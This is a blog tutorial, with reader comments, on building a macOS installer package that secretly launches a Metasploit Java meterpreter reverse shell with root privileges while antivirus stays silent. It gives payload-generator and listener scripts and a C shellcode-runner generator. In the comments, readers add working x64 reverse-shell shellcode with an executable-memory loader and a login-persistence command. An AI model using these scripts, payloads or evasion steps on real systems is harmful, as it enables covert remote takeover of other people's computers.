64bit OSX hacking with Metasploit

In the previous articles I was describing how to install and run 64bit OSX in KVM (in this example it is Mountain Lion 10.8.2), now lest focus on some simple exercise in creating an installer via Iceberg which would contain a meterpreter payload and will get executed once installed on the host. Also I have installed an antivirus for OSX. According to some online review there are a few products that boast high ratings, one of them being Trend Micro Titanium. Also note that I have no firewall setup on the OSX.

There is a previous article describing a very similar approach for an old 32bit 10.6.x OSX  here : https://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit

In this test I have installed Trend Micro Titanium on OSX 10.8.2 and prepared an installer containing Java meterpreter payload. Here is a simple shell script to make things easier:

clear  
echo "************************************************************"
echo "   Automatic  Java Meterpreter generator - FOR METASPLOIT   "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir ShellCode
./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar  
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."

So next lets copy over the test.jar to the virtualized osx and load Iceberg. There is a video demonstration at the end that describes the whole process. Setting up Iceberg is very easy, just make sure you have the jar meterpreter file handy and the loader script which should be as follows:

#!/bin/sh
/usr/bin/java -jar /Applications/Utilities/test.jar

I have chosen the application path /Applications/Utilities/ for the jar file to be installed in and a postupgrade or postinstall script that will load the test.jar file while the installer runs. Also While creating the Iceberg installer make sure that the “Requres Admin” is checked otherwise you wont get root privileges.  Here are some screenshots :

iceberg01iceberg02Once you compile the project the installer located in /Users/user/Test (or whatever you have called the project) can be executed. Also I have created as simple shell script for the Metasploit listener for the shell:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler  PAYLOAD=java/meterpreter/reverse_tcp LHOST=$127.0.0.1 LPORT=$port  E

So once we execute the pkg installer a root meterpreter shell pops up. Trend Micro Titanium seems to be happy with it.

iceberg03rooted-osxSo the Java meterpreter payload works well, how about native reverse tcp shell payloads for 64bit OSX ? They dont work as I believe there is some memory execute prevention in the kernel. I have tested it here with the following C source generator:

clear  
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir ShellCode
./msfpayload   osx/x64/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x64/xor  > test.c
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp.c 
cat ready.c >> temp.c 
echo ";" >> temp.c
echo "int main(void) { ((void (*)())micro)();" >> temp.c 
echo "}" >> temp.c  
mv temp.c final.c
echo "final.c is ready in ShellCode, please compile it usig gcc on OSX"
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 
cd ..

Once we copy over the final.c to OSX we can compile it via GCC and execute, but all I get is a bus error:

gcc.01dmesg01So we are pretty much stuck with the Java meterpreter payload for 64bit OSX systems.

Interesting Trend Micro Titanium processes on the OSX:

ps aux | grep Trend
user             280   0.4  1.3   713228  26736   ??  Ss    9:19AM   0:20.30 /Applications/TrendMicro.localized/iTIS.app/Contents/MacOS/iTIS -update
root             364   0.0  2.2   652028  45640   ??  Ss    9:20AM   0:21.90 /Library/Application Support/TrendMicro/TmccMac/iCoreService_av -p 61301 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmAntiMalware.dylib
user             196   0.0  0.5   690412  10752   ??  S     9:13AM   0:01.49 /Library/Application Support/TrendMicro/TmccMac/UIMgmt.app/Contents/MacOS/UIMgmt
root              62   0.0  0.2   617688   3472   ??  Ss    9:11AM   0:06.00 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61100 -n 61100 /Library/Application Support/TrendMicro/common/lib/libnamingService.dylib /Library/Application Support/TrendMicro/common/lib/libtaskManager.dylib /Library/Application Support/TrendMicro/common/lib/libnotificationService.dylib /Library/Application Support/TrendMicro/common/lib/libTmUpdate.dylib /Library/Application Support/TrendMicro/common/lib/libTmDb.dylib
root              61   0.0  0.2   617520   3912   ??  Ss    9:11AM   0:00.31 /Library/Application Support/TrendMicro/TmccMac/iCoreService_wp -p 61201 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmProxy.dylib
root              59   0.0  0.2   628928   4128   ??  Ss    9:11AM   0:00.65 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61401 -n 61100 /Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/iTISPlugin
root             481   0.0  0.0  2433436      0   ??  R     9:41AM   0:00.00 grep Trend

And here is the whole process summary in a short video:

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

14 Responses to 64bit OSX hacking with Metasploit

  1. anonymous says:

    SIGBUS == Trying to exeute non executable memory, you are not even attempting to put the shellcode somewhere executable.

    $ ./msfpayload osx/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 C;
    #include
    #include
    #include
    #include

    unsigned char buf[] =
    “\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f”
    “\x05\x49\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6”
    “\x56\x48\xbe\x00\x02\x11\x5c\x7f\x00\x00\x01\x56\x48\x89\xe6”
    “\x6a\x10\x5a\x0f\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31”
    “\xf6\x0f\x05\xb8\x5a\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31”
    “\xc0\xb8\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e”
    “\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2\x52\x57\x48\x89”
    “\xe6\x0f\x05”;

    int main(int argc, char **argv)
    {
    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    printf(“ret: 0x%x”,ptr);
    memcpy(ptr,buf,sizeof buf);
    void (*fp)() = (void (*)())ptr;
    fp();

    }

    $ ./sc

    *****
    $ nc -l 127.0.0.1 4444
    id;
    uid=501(user) gid=20(staff)

  2. hello,
    thank you for this awesome post!
    I tried to add persistence simply by adding the following line to the file install.sh:

    defaults write /Library/Preferences/loginwindow AutoLaunchedApplicationDictionary -array-add ‘{Path=”/Applications/Utilities/test.jar”;}’

    it works for me: at reboot i get the meterpreter session :-)

    ….

  3. Eli says:

    Is there anyway I could make this on Kali Linux and then use it on a mac?

  4. Aristobulo Gomez says:

    Hi, a newbie question, I just install osx 10.8.2 to try this and installed iceberg but it doesn`t open it just jump on the dock but doesn`t open any window, could you help me?

  5. Patrick Kantorski says:

    Hey astr0baby! I’m new to using Metasploit, but I’ve learned a lot in the past few days.

    [1] I’m attempting to enter my Mac OS X from my Kali Linux virtual machine using your tutorial. I got creating the files down, but theres a couple things I’m not sure about. When using the Java Meterpreter script, for the LHOST that goes into creating the test.jar file, would the LHOST be the local host ip of my Mac OS X (to be penetrated) or of Linux (the listener)? I’m trying to understand how the basic concept works. My guess is that creating and executing the file open Mac OS X to the listener, but I’m not quite sure if this is done by utilizing the LHOST of the target OS X or LHOST of the Listener.

    [2] Also, I know that the default port is 4444 for Metasploit, however, when I run NMAP it seems that this port is closed.. Additionally, this is what I get running it on my Kali IP vs OS X IP.

    From the Ethernet Adapter IP on Kali (10.0.0.11):
    All 1000 scanned ports on 10.0.0.11 are closed

    From the Ethernet Adapter IP on Mac OS X (10.0.0.2):
    Not shown: 987 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    445/tcp open microsoft-ds
    548/tcp open afp
    3580/tcp open nati-svrloc
    5000/tcp open upnp
    5001/tcp open commplex-link
    5002/tcp open rfe
    5900/tcp open vnc
    6881/tcp open bittorrent-tracker
    7000/tcp open afs3-fileserver
    7001/tcp open afs3-callback
    7100/tcp open font-service
    10000/tcp open snet-sensor-mgmt
    MAC Address: XX:XX:XX:XX:XX:XX (Apple)

    I tried turning off the firewall on both sides, but I’m still having trouble finding a working port for 10.0.0.11. How is this port chosen and how can I check that its open on both sides? Or maybe I don’t need to use this particular IP to perform this test at all…? Can I also possibly tunnel through an open port instead if not 4444? Some ports are blocked for the internet in my apartment building and everyone has their own router.

    [3] Lastly, I see that your listener script has the default Kali Linux local IP 127.0.0.1. At the start of initializing msfconsole, I initially get this prompt:

    [-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host “localhost” (::1) and accepting
    TCP/IP connections on port 5432?
    could not connect to server: Connection refused
    Is the server running on host “localhost” (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

    From the Local Loopback IP on Kali (127.0.0.1):
    Not shown: 999 closed ports
    PORT STATE SERVICE
    631/tcp open ipp

    Does this mean that 631 is the only port I can choose? Maybe I have to open more ports to 127.0.0.1..? Not completely sure what to make of it.

    I know that I asked a lot.. Maybe your answer to one of my first questions will fix most of my problems, but I want to learn and understand more about this process. When you have time, a response would be deeply appreciated and I’m sure it will help others in my situation. Thanks again for making the tutorial!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s